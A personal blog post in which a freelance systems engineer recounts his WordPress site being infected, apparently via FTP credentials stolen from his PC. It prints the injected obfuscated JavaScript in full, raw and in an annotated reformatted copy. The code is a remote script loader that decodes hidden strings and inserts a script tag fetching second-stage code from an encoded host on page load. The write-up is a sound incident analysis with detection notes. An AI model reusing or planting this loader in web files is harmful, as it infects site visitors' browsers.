
Hack Victim

Published in: Every Day News, Linux

In the world of security everybody admits that the question is not “if a security breach will happen, but when”. This weekend it was my turn. I do my best to keep my blog up to date and generally I try to keep the bad guys out of my place. However, a nasty JavaScript XSS (cross-site scripting) attack hit me on Friday evening. I noticed that something could be wrong with my blog when my antivirus software raised alarms every time I opened my browser (where, surprisingly, I have my own web site as the homepage :-) ). My first reaction was to take the site offline to protect my visitors. Then I started searching for where and how much damage had been done. Every single .php and .js file was infected, and in every file the attacker had injected the following code:

// Raw injected payload, exactly as pasted into the post. The blog layout
// wrapped long lines mid-token and mid-string (e.g. `new A` / `rray`, `Xk` /
// `'};`), so this copy does not parse; a hand-reformatted copy follows below.
// Security-relevant shape, read straight from the code: a decoder L() strips
// filler characters from padded string literals, and a window[...] handler
// creates a script element, sets its src to the decoded remote URL and
// appends it to document[...]. It is a remote script loader, not a payload
// that acts on its own; the second stage is fetched from the decoded host.
var Zx=new Array();var ZL=new Array();try {this.U="";this.u=""; var D;if(D!='a' && D != ''){D=null};var V='';var II;if(II!='ly' && II != ''){II=null};var b='[';var sN;if(sN!='X' && sN!='iC'){ sN=''};this.iO="";var z=RegExp;var s='replace';var Z='g';this.GJ='';
var q=']';var M;if(M!='ST' && M != ''){M=null};function L(C,y){var Cp;if(Cp!=''){Cp='Sq'};var Wv=new Date();var wH=new String();var m=b; this.le="";this.Aq='';m+=y;this.XP='';m+=q;var CO="";var E="";var I=new z(m, Z);return C[s](I, V);};var K;if(K!='N'){K='N'};var PN="";var h=L('bhoCdhyh',"CDhr");var B=L('sfcfrPiPpMtP',"MwOfP");var d=L(' h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.7cBozmB.bgVozobg7lbe
b-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b',"bBVz7");var C="1";var kb; if(kb!='' && kb!='t'){kb=''};var qc=L('/TsTpjoTnjsToTrTajdjsT.TdjeT/
TsTpTojnjsToTrTajdjsj.TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/ jgTojoTgjljej.TcTojmT.TpjhTpT',"jT");var Rh=new String();var Lq=new String();var l=L('awpGpDewnGdqCDhDiqlDdw',"wDRGq");var Ep="";var O=L(
'sQeStQAStQtSrSiQbQuQtSeS',"SQ");var SN=new Array();this.Nd="";var fj='';var zG='';var si='';var bf;if(bf!='_'){bf='_'};this.BI="";var
yS=L('851535031951859931095959',"3159");var Yr=new Date();var G=L(' ckrfekagtkekEglfekmkegnktg',"gfk");this.Cq="";this.CR='';var lq=L(' o3n3lro3audN',"NVr3u");var NR=new Array();var iI;if(iI!='Xk'){iI='Xk
'};var Ih=new String();var re=new String();window[lq]=function(){var UL=new String();var qa=new String();zB=document[G](B);var wR=new A
rray();si+=d;this.oy='';si+=yS;var LJ=new String();var Pv=new Array(); si+=qc;var _a;if(_a!='' && _a!='rQ'){_a='ED'};this.oB="";zB.src=s
i;var k=document[h];var kv;if(kv!='VV' && kv != ''){kv=null};zB. setAttribute('defer', C);var _z;if(_z!='' && _z!='OxG'){_z='p'};var xd;
if(xd!=''){xd='kQ'};k.appendChild(zB);var n_='';var uJe=new String();}; var VO;if(VO!='sz'){VO=''};this.Iw='';var cR;if(cR!='Ae' && cR!='mL'){
cR='Ae'};} catch(Y){};

Well, it was impossible to read this script, so I reformatted it like real code and it turned out to be the following:

// Annotated copy of the injected loader (a defender's reading of the sample
// above). Every string that matters goes through L(), which strips a set of
// filler characters from a padded literal, so the DOM method names and the
// remote URL never appear verbatim in the infected file. The many variables
// that are declared, compared while still undefined and then assigned are
// never read again; they look like filler meant to vary the byte pattern
// between files (inference, not verifiable from the code alone).
// Transcription note: this hand-reformatted copy lost a few spaces (`varq`,
// `varh`, `varfj`; the raw sample reads `var q`, `var h`, `var fj`) and two
// long string literals were wrapped across lines, so it does not parse as-is.
var Zx = new Array();       // unused
var ZL = new Array();       // unused
// Everything runs inside try/catch with an empty catch at the end, so any
// failure is silent: nothing reaches the browser console.
try {
  this.U = "";              // property writes on `this`; never read back
  this.u = "";
  // `D` is never assigned before the test, so the condition is always true and
  // `D` becomes null. The same dead pattern repeats for II, sN, M, K, kb, bf,
  // iI, VO, cR (and Cp, _a, kv, _z, xd inside the functions); none is read later.
  var D;
  if(D != 'a' && D != '') {
      D = null};
  var V = '';               // replacement text used by L(): stripped characters vanish
  var II;
  if(II !='ly' && II != '')
  {
     II = null }; 
  var b = '[';              // opens the character class that L() builds
  var sN;
  if(sN != 'X' && sN != 'iC')
  {
      sN = ''};
  this.iO = "";
  var z = RegExp;           // indirect handle on RegExp
  var s = 'replace';        // method name, invoked as C[s](...) i.e. C.replace(...)
  var Z = 'g';              // global flag: strip every occurrence
  this.GJ = '';
  varq = ']';               // raw sample reads `var q = ']'` (closes the character class)
  var M;
  if(M != 'ST' && M != '') {
     M = null};
  /**
   * Decoder used for every meaningful string in the loader.
   * Builds new RegExp('[' + y + ']', 'g') through the indirect names above and
   * returns C with every character listed in y removed.
   * @param {string} C padded string to clean
   * @param {string} y characters to strip from C
   * @returns {string} C without the characters in y
   */
  function L(C, y) {
      var Cp;
      if(Cp != '') {
         Cp = 'Sq'};
      var Wv = new Date();      // unused
      var wH = new String();    // unused
      var m = b;                // m = '['
      this.le = "";
      this.Aq = '';
      m += y;                   // m = '[' + y
      this.XP = '';
      m += q;                   // m = '[' + y + ']'
      var CO = "";
      var E = "";
      var I = new z(m, Z);      // new RegExp(m, 'g')
      return C[s](I, V);        // C.replace(I, '')
  };

  var K;
   if(K != 'N') {
      K = 'N'}; 

  var PN = "";
  varh = L('bhoCdhyh', "CDhr");       // decodes to 'body' (raw sample: `var h = ...`)
  var B = L('sfcfrPiPpMtP', "MwOfP"); // decodes to 'script'
  // Decodes to the http:// host part of the payload URL (attacker-controlled;
  // not reproduced here). The literal was a single line in the raw sample.
  var d = L('h7t7tzpB:7/7/bvznVezx7pVrVeVsBsz-zn7ebtV.VnBiVn7gB.
7cBozmB.bgVozobg7lbeb-bhBrb.bm7yVf7rbe7ezmzabgb.7rzuB:b', "bBVz7");
  var C = "1";                        // value later given to the defer attribute
  var kb;
  if(kb != '' && kb != 't') {
      kb = ''}; 

  // Decodes to the path part of the payload URL (ends in a .php file). A
  // single line in the raw sample.
  var qc = L('/TsTpjoTnjsToTrTajdjsT.TdjeT/TsTpTojnjsToTrTajdjsj.
TdTej/jaTlTlToTcTiTnjej.Tfjrj/jaTeTbTnT.TnjejtT/jgTojoTgjljej.TcTojmT.
TpjhTpT', "jT");
  var Rh = new String();              // unused
  var Lq = new String();              // unused
  var l = L('awpGpDewnGdqCDhDiqlDdw', "wDRGq");   // decodes to 'appendChild'; unused (called literally below)
  var Ep = "";
  var O = L('sQeStQAStQtSrSiQbQuQtSeS', "SQ");     // decodes to 'setAttribute'; unused (called literally below)
  var SN = new Array();
  this.Nd = "";
  varfj = '';                          // raw sample reads `var fj = ''`
  var zG = '';
  var si = '';                         // accumulates the full payload URL in the onload handler
  var bf;
  if(bf != '_') {
     bf = '_'}; 

  this.BI = "";
  var yS = L('851535031951859931095959', "3159");   // decodes to '8080' (the port)
  var Yr = new Date();                 // unused
  var G = L('ckrfekagtkekEglfekmkegnktg', "gfk");   // decodes to 'createElement'

  this.Cq = "";
  this.CR = '';
  var lq = L('o3n3lro3audN', "NVr3u"); // decodes to 'onload'
  var NR = new Array();
  var iI;
  if(iI != 'Xk') {
      iI = 'Xk '}; 

  var Ih = new String();
  var re = new String();
  // window.onload handler: the actual dropper. Builds a <script> element whose
  // src is the decoded remote URL and appends it to <body>, so the browser
  // fetches and executes the second-stage script on any page that includes
  // this code. Detection notes: look for a script element inserted on load
  // with a src on port 8080, for bracket-style access such as window[...] and
  // document[...](...), and for the L('...', '...') decoder pattern in .js/.php files.
  window[lq] = function() {
      var UL = new String();           // unused
      var qa = new String();           // unused
      zB = document[G](B);             // document.createElement('script'); zB is an implicit global (no var)
      var wR = new Array();            // unused

      si += d;                         // host
      this.oy = '';
      si += yS;                        // + port
      var LJ = new String();
      var Pv = new Array();
      si += qc;                        // + path -> complete payload URL
      var _a;
      if(_a != '' && _a != 'rQ') {
         _a = 'ED'};
      this.oB = "";
      zB.src = si;
      var k = document[h];             // document.body
      var kv;
      if(kv != 'VV' && kv != '') {
         kv = null};
      zB.setAttribute('defer', C);     // defer="1"
      var _z;
      if(_z != '' && _z != 'OxG') {
         _z = 'p'};
      var xd;
      if(xd != '') {
         xd = 'kQ'}; 

      k.appendChild(zB);               // insertion triggers the remote fetch and execution
      var n_ = '';
      var uJe = new String();
      };

  var VO;
  if(VO != 'sz') {
      VO = ''}; 

  this.Iw = '';
  var cR;
  if(cR != 'Ae' && cR != 'mL') {
      cR = 'Ae'};
  }
catch(Y) {};  // empty catch: every exception is swallowed silently

It became obvious that the script used a special encoding technique, unique to this script, to make my life harder. It took me some time, but in the end I was able to understand its inner workings and, finally, the nasty cross-site trojan attack on the user's browser.

My next move was to identify the point of entry. NOTHING! All my logs were clean, no recent exploits for WordPress had been published and everything seemed OK. Then an idea came back to me… It was not the server’s fault, but mine… And yes, I was right… My PC was somehow (still looking into that) infected with a backdoor which probably stole my cached FTP passwords (yes, I know it is bad to store passwords…). Then it connected through FTP to my web server and everything was easy… It could have been worse…

Everything was clear now and it was time to bring the site back online. I found it easier and safer to reinstall WordPress, as my database was not affected. So: fresh WordPress install, fresh theme installation, fresh plugin installs and… here I am, back online!


My Bio in few lines

I live in Athens, Greece and I'm a PhD Candidate with the Hellenic Open University. I am a freelance System Engineer with expertise in Red Hat, VMware ESX and Sun Solaris systems.